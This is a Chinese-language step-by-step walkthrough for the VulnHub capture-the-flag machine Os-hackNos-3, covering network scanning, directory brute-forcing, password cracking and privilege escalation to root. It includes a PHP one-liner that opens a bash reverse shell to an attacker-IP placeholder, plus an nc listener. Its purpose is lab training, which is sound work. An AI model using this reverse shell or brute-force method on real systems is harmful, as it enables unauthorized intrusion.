HackNos: Os-hackNos-3 靶机通关详细教程

靶机概述

• 下载地址: https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/
• 难度等级: 容易+中级(CTF风格)
• 主要技术点: Web应用安全、密码破解、电子表格编码分析、权限提升

第一阶段: 信息收集

1. 发现目标IP

使用arp-scan工具扫描本地网络:

arp-scan -l

这将列出局域网内所有活跃设备，从中识别出靶机的IP地址。

2. 端口扫描

使用nmap进行详细扫描:

nmap -sV -p- <靶机IP>

参数说明:

• -sV: 服务版本探测
• -p-: 扫描所有端口(1-65535)

3. Web服务探测

访问靶机的80端口:

http://<靶机IP>

发现存在websec目录:

http://<靶机IP>/websec/

第二阶段: Web应用渗透

1. 目录爆破

使用dirb工具爆破web目录:

dirb http://<靶机IP>/websec/

发现admin登录界面:

http://<靶机IP>/websec/admin/

2. 密码破解

1. 在页面中发现邮箱地址(可作为用户名)
2. 使用cewl生成密码字典:

cewl http://<靶机IP>/websec/ -w passwords.txt

3. 使用Burp Suite进行爆破:
   • 注意: 存在WAF限制，每分钟只能尝试一次
   • 成功密码: Securityx

3. 获取Web Shell

1. 登录后找到可以执行命令的功能点
2. 使用Kali生成PHP反弹shell代码:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<攻击机IP>/<端口> 0>&1'"); ?>

3. 在攻击机监听:

nc -lvnp <端口>

4. 成功获取低权限shell

第三阶段: 权限提升

1. 查找flag文件

在系统中搜索第一个flag文件:

find / -name "*flag*" 2>/dev/null

通常在/var/www/local/目录下

2. 数据库文件分析

在/local/目录下发现数据库文件:

• 文件内容使用电子表格编码(fackespreadsheet)
• 使用电子表格解码工具分析，获取密码

3. 用户切换

使用解码获得的密码登录blackdevil用户:

su blackdevil

输入获得的密码

4. 最终提权

检查sudo权限:

sudo -l

发现可以使用sudo su直接提权:

sudo su

输入blackdevil用户的密码，获取root权限

5. 获取最终flag

在root目录下查找第二个flag文件

其他可能的提权方式

1. SUID权限检查:

find / -perm -4000 2>/dev/null

2. 内核漏洞利用
3. 定时任务分析
4. 环境变量劫持

总结与学习要点

1. 信息收集是渗透测试的基础
2. 密码破解时要注意WAF限制
3. 系统文件分析可能隐藏关键信息
4. 多种提权方式需要全面检查
5. CTF靶机通常设计有多重关卡

注意事项

1. 实验环境需在授权范围内进行
2. 真实环境中爆破密码需谨慎
3. 提权操作可能影响系统稳定性
4. 建议在虚拟环境中复现

希望本教程对您的渗透测试学习有所帮助。如有任何问题或发现教程中的错误，欢迎交流指正。